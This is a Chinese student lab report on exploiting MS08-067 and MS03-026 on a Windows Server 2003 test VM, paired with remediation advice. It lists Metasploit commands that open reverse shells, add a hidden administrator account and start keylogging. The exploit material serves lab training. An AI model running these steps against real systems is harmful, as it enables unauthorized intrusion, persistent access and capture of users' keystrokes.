windows server 2003 系统提权

《系统提权》作业

课程名称：《系统提权》

【要求】

对Windows Server2003操作系统MS08_067、MS03_026漏洞进行提权渗透测试；
对MS03_026漏洞开启远程桌面服务；
操作过程可自由发挥；
概念越详细越好；
渗透和验证过程必要有截图和文字说明；
其余部分均可配文字简介叙述；
作业模板在此基础上可以自由发挥设计；
熟悉虚拟机的使用，了解渗透测试工具的使用方法和Linux、DOS命令

测试对象

	设备名称	域名	IP地址
1.	Win2K3 Metasploitable	10.10.10.131	10.10.10.131
2．	kali-linux-2017.3-vm-amd64	10.10.10.130	10.10.10.130

二、测试工具

	工具名称	描述
	Nmap	NMap，也就是Network Mapper，最早是Linux下的网络扫描和嗅探工具包。 nmap是一个网络连接端扫描软件，用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端，并且推断计算机运行哪个操作系统（这是亦称 fingerprinting）。它是网络管理员必用的软件之一，以及用以评估网络系统安全。正如大多数被用于网络安全的工具，nmap 也是不少黑客及骇客（又称脚本小子）爱用的工具。系统管理员可以利用nmap来探测工作环境中未经批准使用的服务器，但是黑客会利用nmap来搜集目标电脑的网络设定，从而计划攻击的方法。 Nmap 常被跟评估系统漏洞软件Nessus 混为一谈。Nmap 以隐秘的手法，避开闯入检测系统的监视，并尽可能不影响目标系统的日常操作。
	metasploit	Metasploit是一款开源的安全漏洞检测工具，可以帮助安全和IT专业人士识别安全性问题，验证漏洞的缓解措施，并管理专家驱动的安全性进行评估，提供真正的安全风险情报。这些功能包括智能开发，代码审计，Web应用程序扫描，社会工程。团队合作，在Metasploit和综合报告提出了他们的发现。 Metasploit是一个免费的、可下载的框架，通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。
	Kali Linux	Kali Linux是基于Debian的Linux发行版，设计用于数字取证操作系统。由Offensive Security Ltd维护和资助。最先由Offensive Security的Mati Aharoni和Devon Kearns通过重写BackTrack来完成，BackTrack是他们之前写的用于取证的Linux发行版。 Kali Linux预装了许多渗透测试软件，包括nmap 、Wireshark 、John the Ripper，以及Aircrack-ng.[2] 用户可通过硬盘、live CD或live USB运行Kali Linux。Kali Linux既有32位和64位的镜像。可用于x86 指令集。同时还有基于ARM架构的镜像，可用于树莓派和三星的ARM Chromebook

三、被测设备信息情况

1.基本信息

	IP	操作系统
1.	10.10.10.131	Windows server 2003

2.端口开放情况

	端口号	服务	产品版本
1.	21/tcp	ftp	Microsoft ftpd
2.	80/tcp	http	Microsoft IIS httpd 6.0
3	135/tcp	msrpc	Microsoft Windows RPC
4	139/tcp	netbios-ssn	Microsoft Windows netbios-ssn
5	445/tcp	microsoft-ds	Microsoft Windows 2003 or 2008 microsoft-ds
6	777/tcp	multiling-http	None
7	1025/tcp	msrpc	Microsoft Windows RPC
8	1026/tcp	msrpc	Microsoft Windows RPC
9	1027/tcp	msrpc	Microsoft Windows RPC
10	1029/tcp	msrpc	Microsoft Windows RPC
11	3389/tcp	ms-wbt-server	Microsoft Terminal Service
12	6002/tcp	http	SafeNet Sentinel Protection Server 7.3
13	7001/tcp	afs3-callback	None
14	7002/tcp	http	SafeNet Sentinel Keys License Monitor
15	8099/tcp	http	Microsoft IIS httpd 6.0

【漏洞名称】

MS08_067

【漏洞描述】

MS08-067漏洞将会影响除Windows Server 2008 Core以外的所有Windows系统，包括：Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本，甚至还包括测试阶段的Windows 7 Pro-Beta。

发布日期：2008/10/22

下载大小：因操作系统而异

说明：微软安全公告KB958644

漏洞影响：服务器服务中的漏洞可能允许远程执行代码

发布日期：2008/10/22

下载大小：因操作系统而异。

受影响的操作系统： Windows 2000;XP;Server 2003;Vista;Server 2008;7 Beta

此安全更新解决了服务器服务中一个秘密报告的漏洞。如果用户在受影响的系统上收到特制的 RPC 请求，则该漏洞可能允许远程执行代码。在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上，攻击者可能未经身份验证即可利用此漏洞运行任意代码。此漏洞可能用于进行蠕虫攻击。防火墙最佳做法和标准的默认防火墙配置有助于保护网络资源免受从企业外部发起的攻击。可以通过安装本 Microsoft 更新程序来保护计算机不受侵害。安装后，可能必须重新启动计算机。

严重等级：Windows 2000;XP;Server 2003为严重，Windows Vista;Server 2008;7 Beta为重要

【解决措施】

MS08-067漏洞的终端用户解决方案
　　这是一个针对139、445端口的RPC服务进行***的漏洞，可以直接获取系统控制权。根据微软的消息，该***无法穿透DEP机制的保护，对正版用户，该漏洞对XPSP2以上版本（含SP2）和Server2003SP1（含SP1）系统无效，因此主要受到威胁的用户应该是Windows2000和WindowsXPSP2以前版本用户。但由于一些盗版传播中，被人为降低了安全级别或者修改过安全机制，因此除了上述版本的用户也有可能受到***。
　　据安天介绍，一些常规的解决思路是，当有重大远程漏洞发生时，对于不需要实时连接的系统，可以考虑先断网检测安全配置，然后采用调整防火墙和安全策略的方式保证联网打补丁时段的安全，然后再进行补丁升级。
　　一、桌面与工作站用户的安全配置方案
　　桌面系统主要以浏览、下载、游戏、工作等与用户直接操作交互为主要应用方式，其多数网络操作为用户主动对外发起连接，而不是凭借本地监听端口为外部用户提供服务。桌面系统如果不提供共享打印，不需要在局域网游戏（如CS、FIFA等）中作为主机使用，可以通过设置为禁止发布发起连接模式，来阻断所有向本主机发起的连接。进行有关设置不会影响到操作者的浏览、聊天、下载、在线视频、常见网游等操作。
　　进行这样的设置不仅可以阻断MS08-067***，而且可以阻断所有相同针对主机固定端口的***，缺点是如果主机提供打印共享、网络共享目录等服务则会失效，在CS、FIFA等游戏中无法作为host主机使用，还可能与蓝波宽带拨号程序冲突。
　　1、Windows自带防火墙的相关配置
　　步骤1：在控制面板中找到防火墙。
　　
　　步骤2：选择更改设置，此时Vista系统的安全机制可能需要灰屏确认，请选择是。
　　
　　步骤3：启动防火墙并选择阻止所有传入连接。
　　
　　2、其它防火墙的安全设置
　　如果Windows系统的防火墙不支持本项设置，可通过其他防火墙实现，以安天盾防火墙免费工具为例。
　　步骤1：通过单击Windows开始菜单中安天安全中心项目，或者单击托盘中的安天安全中心图标，启动有关配置。
　　
　　步骤2：在安天安全中心界面上点击设置,进行漏洞补丁的调试。
　　
　　步骤3：将策略选择为系统初装。
　　
　　二、不需要开放RPC服务的服务器安全配置方案
　　网络服务器用户以固定端口对外进行服务，因此不能采用阻断所有传入连接的方式进行配置，否则会失效。而从WindowNTServer到Server2008，不需要开放RPC服务器的用户可以不依赖任何安全工具，仅凭借WindowsServer自身安全机制既可实现屏蔽，如果仅是直接关闭RPC服务，会给本机管理带来一些麻烦。
　　步骤1：点击右键，选择网络连接属性。
　　
　　步骤2：点击Internet协议（TCP/IP）属性。
　　
　　步骤3：在弹出的Internet协议（TCP/IP）属性对话框中点击“高级”。
　　
　　步骤4：对TCP/IP筛选中点击属性。
　　
　　步骤5：在TCP/IP筛选中配置允许访问的端口，只要不包含TCP139和445则MS08-067RPC***失效。
　　
　　三、需要开放RPC服务的服务器安全配置方案
　　需要开放RPC服务的服务器，如网络打印、网络共享和一些RPC通讯调用的节点，不能够通过上述关闭端口的方式，否则会造成无效。可以转而采用打补丁、打开DEP策略，或安装主机IPS的方法。下面介绍一下系统DEP保护配置的方法。
　　步骤1：我的电脑右键点击属性，点击“高级”页中的“设置”按钮。
　　
　　步骤2：设定数据执行保护策略，修改后重新启动电脑。
　　
　　在这里，进行不同的选择会有不同的效果，如果选择“仅为基本Windows程序和服务启用DEP”功能，则可以挡住本次RPC***，也可以挡住目前主流的针对Windows开放端口的***。在获得一定的安全性的情况下，保证系统的兼容性。但是缺点是不能保护类似IE浏览器、Outlook等比较脆弱的互联网应用程序，不能防范类似挂马注入的***。
　　如果选择“为除下列选定程序之外的所有程序和服务启用DEP”功能，则在上述效果的基础上，对Web挂马、各种应用软件插件注入都有很好的效果，具有更强的系统安全性，不过缺点是与部分应用程序冲突，但可以通过将冲突的程序设置为例外来解决。
四、安装相应补丁，解决安全隐患
根据自己系统情况寻找地址安装单一补丁，是一个有效修补漏洞并规避微软黑屏策略影响的方法。
微软的补丁都可以离线安装，可以选择将有漏洞的系统断网，从安全的系统上下载补丁再用移动存储复制到有漏洞的系统下。

【漏洞验证】

打开msfconsole

指令:mafconsole

搜索ms08_067

指令:search ms08_067

3使用ma08_067_netapi

指令:use exploit/windows/smb/ms08_067_netapi

4.查看攻击载荷

指令:Show payloads

5. 设置windows/meterpreter/reverse_tcp载荷

指令: set payload windows/meterpreter/reverse_tcp

6.查看需要配置的参数

指令: show options

7.设置参数

Lhost为攻击方ip,rhost为被攻击方ip,target为目标主机名称

指令: set lhost 10.10.10.130

set rhost 10.10.10.131

set target 3

8.发动攻击

指令:exploit

9.进入shell创建用户

指令:shell

net user hgc 123 /add

10.设置为超级用户

指令: net localgroup administrators hgc /add

11.对目标主机屏幕截取

键盘记录

指令: keysscan_start

keyscan_dump

keyscan_stop

13.创建文件

指令:mkdir hgc

【漏洞名称】

MS03_026

【漏洞描述】

1、Remote Procedure Call (RPC)是Windows 操作系统使用的一种远程过程调用协议，RPC提供进程间交互通信机制，允许在某台计算机上运行程序的无缝地在远程系统上执行代码。协议本身源自开放软件基金会的RPC协议，Microsoft在其基础上增加了自己的一些扩展。

eEye的研究人员发现，由于Windows RPC DCOM接口对报文的长度域缺乏检查导致发生基于堆的溢出，远程***者可以利用这些漏洞以本地系统权限在系统上执行任意指令。

漏洞实质上影响的是使用RPC的DCOM接口，此接口处理由客户端机器发送给服务器的DCOM对象激活请求(如UNC路径)。***者通过向目标发送畸形 RPC DCOM请求来利用这些漏洞。成功利用此漏洞可以以本地系统权限执行任意指令。***者可以在系统上执行任意操作，如安装程序、查看或更改、删除数据或创建系统管理员权限的帐户。

使用者可以通过 135(UDP/TCP)、137/UDP、138/UDP、139/TCP、445(UDP/TCP)、593/TCP端口进行攻击。对于启动了COM Internet服务和RPC over HTTP的用户来说，还可能通过80/TCP和443/TCP端口进行***。

2、Microsoft DCOM RPC相关系统漏洞,具体内容即为MS03-026和MS03-039.正因为此,造成Blaster.Worm(冲击波).以及 w32.Nachi.Worm(冲击波杀手)蠕虫病毒在校园网络中的泛滥.而且DCOM RPC漏洞的remote root ,可以让一个不具备任何基础知识的攻击者,在2分钟之内进入到你的计算机系统中,他所做的仅仅是从网上下载一个简单的攻击工具和一个扫描工具就可以了.

查找ms03-026系统漏洞的利用：

msf>search ms03_026

显示找到的ms03-026的路径

msf>use exploit/windows/.../ms03_026_dcom

进入后可以输入

msf exploit(ms03_026_dcom) > show options

来查看所需要输入的参数

msf exploit(ms03_026_dcom) > show payloads

显示当前模块的所有攻击载荷。攻击载荷是我们希望在目标系统被渗透后去执行的代码。

msf exploit(ms03_026_dcom) > set PAYLOAD generic/shell_reverse_tcp

选择一个反弹式的shell

msf exploit(ms03_026_dcom) > set RHOST 192.168.250.157

msf exploit(ms03_026_dcom) > set LHOST 192.168.250.135

输入靶机地址和攻击机的地址

msf exploit(ms03_026_dcom) > exploit

开始进行渗透攻击

【解决措施】

解决方法:首先，打开“管理工具”→“服务”管理器，在服务管理器的主窗口服务列表中，找到名称为“Cryptographic Services”的服务项，双击该服务项，在弹出的该服务项属性对话框中，单击“停止”按钮，停止该服务。然后，在资源管理器中，打开系统安装目录\\System32\\文件夹，在该文件夹下，找到名为“catroot2”的文件夹，将其删除或重命名。最后在服务管理器中，将“Cryptographic Services”服务启动，并安装系统漏洞补丁，一般就可以正常安装系统补丁了

通过命令行的方法来解决:1、在开始中运行cmd，2、在窗口中运行net stop cryptsvc，回车，3、ren %systemroot%\system32\catroot2 oldcatroot2，回车，4、net start cryptsvc，回车，5、exit，回车。然后就可以了

其实其实现过程是一样的。把Cryptographic Services这个服务给修复好就可以了。
某些XP用户在安装MS03-026补丁出现提示“安装程序不能验证update.inf完整性，请确定加密服务正在此计算机上运行”，点击确定后就退出。

即使在命令行提示符下输入
net start cryptographic service

1、在开始中运行cmd
2、在窗口中运行net stop cryptsvc，
3、ren %systemroot%\system32\catroot2 oldcatroot2，
4、net start cryptsvc，